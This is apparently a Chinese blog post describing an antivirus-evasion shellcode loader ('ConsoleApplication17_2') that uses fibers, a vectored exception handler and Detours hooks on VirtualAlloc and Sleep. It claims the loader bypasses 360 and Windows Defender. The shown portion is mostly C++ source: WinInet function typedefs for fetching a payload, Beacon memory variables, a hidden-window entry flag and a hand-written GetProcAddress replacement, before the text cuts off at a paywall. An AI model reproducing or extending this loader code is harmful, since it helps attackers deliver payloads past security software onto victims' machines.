ConsoleApplication17_2项目免杀（Fiber+VEH Hook Load）

最新推荐文章于 2025-11-24 10:48:04 发布

原创

最新推荐文章于 2025-11-24 10:48:04 发布 · 1k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #c++

加载方式Fiber+VEH Hook Load
Fiber是纤程免杀，VEH是异常报错，hook使用detours来hook VirtualAlloc和sleep，通过异常报错调用实现主动hook
纤程Fiber的概念：纤程是比线程的更小的一个运行单位。可以把一个线程拆分成多个纤程，然后通过人工转换纤程，从而让各个纤程工作。线程的实现通过Windows内核完成的，因此Windows可以自动对线程进行调度。但是纤程是通过用户模式的代码来实现的，是程序员自己写的算法，内核不知道纤程的实现方式，而是你自己定义的调度算法，因此纤程是“非抢占”的调度方式

在这里插入图片描述

可以看到绕过360和window defender杀软

手法是在ConsoleApplication15项目上改动的，之前项目是VEH Hook Load加载的方式，在此加载方式上修改由线程变成纤程Fiber
全代码如下：
ConsoleApplication17_2.cpp


#include <iostream>
#include<Windows.h>
#include "detours.h"
#include "detver.h"
#include <WinInet.h>
#include "base64.h"
#include "AES.h"
#include "need.h"


#pragma comment(lib,"detours.lib")
#pragma comment(lib,"wininet")

#pragma warning(disable:4996)
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

extern "C" PVOID64 _cdecl GetPeb();
using namespace std;

LPVOID Beacon_address;
SIZE_T Beacon_data_len;
DWORD Beacon_Memory_address_flOldProtect;
HANDLE hEvent;


BOOL Vir_FLAG = TRUE;
LPVOID shellcode_addr;

typedef LPVOID(WINAPI* VirtualAllocT)(
	_In_opt_ LPVOID lpAddress,
	_In_     SIZE_T dwSize,
	_In_     DWORD flAllocationType,
	_In_     DWORD flProtect
	);

typedef HINTERNET(WINAPI* InternetOpenW_T)(
	_In_opt_ LPCWSTR lpszAgent,
	_In_ DWORD dwAccessType,
	_In_opt_ LPCWSTR lpszProxy,
	_In_opt_ LPCWSTR lpszProxyBypass,
	_In_ DWORD dwFlags
	);

typedef HINTERNET(WINAPI* InternetConnectW_T)(
	_In_ HINTERNET hInternet,
	_In_ LPCWSTR lpszServerName,
	_In_ INTERNET_PORT nServerPort,
	_In_opt_ LPCWSTR lpszUserName,
	_In_opt_ LPCWSTR lpszPassword,
	_In_ DWORD dwService,
	_In_ DWORD dwFlags,
	_In_opt_ DWORD_PTR dwContext
	);

typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(
	_In_ HINTERNET hConnect,
	_In_opt_ LPCWSTR lpszVerb,
	_In_opt_ LPCWSTR lpszObjectName,
	_In_opt_ LPCWSTR lpszVersion,
	_In_opt_ LPCWSTR lpszReferrer,
	_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,
	_In_ DWORD dwFlags,
	_In_opt_ DWORD_PTR dwContext
	);

typedef HINTERNET(WINAPI* HttpSendRequestW_T)(
	_In_ HINTERNET hRequest,
	_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,
	_In_ DWORD dwHeadersLength,
	_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,
	_In_ DWORD dwOptionalLength
	);

typedef HINTERNET(WINAPI* InternetReadFile_T)(
	_In_ HINTERNET hFile,
	_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,
	_In_ DWORD dwNumberOfBytesToRead,
	_Out_ LPDWORD lpdwNumberOfBytesRead
	);

FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
   
   
	// Get the address of the module's PE header
	BYTE* pImageBase = (BYTE*)hModule;
	IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;
	IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);

	// Get the address of the export directory
	IMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
	IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);

	DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);
	WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);
	DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);

	for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
   
   
		LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);
		if (strcmp(lpProcName, pName) == 0) {
   
   
			WORD ordinal = pAddressOfNameOrdinals[i];
			DWORD functionRVA = pAddressOfFunctions[ordinal];
			FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);
			return pFunction;
		}</

最低0.47元/天解锁文章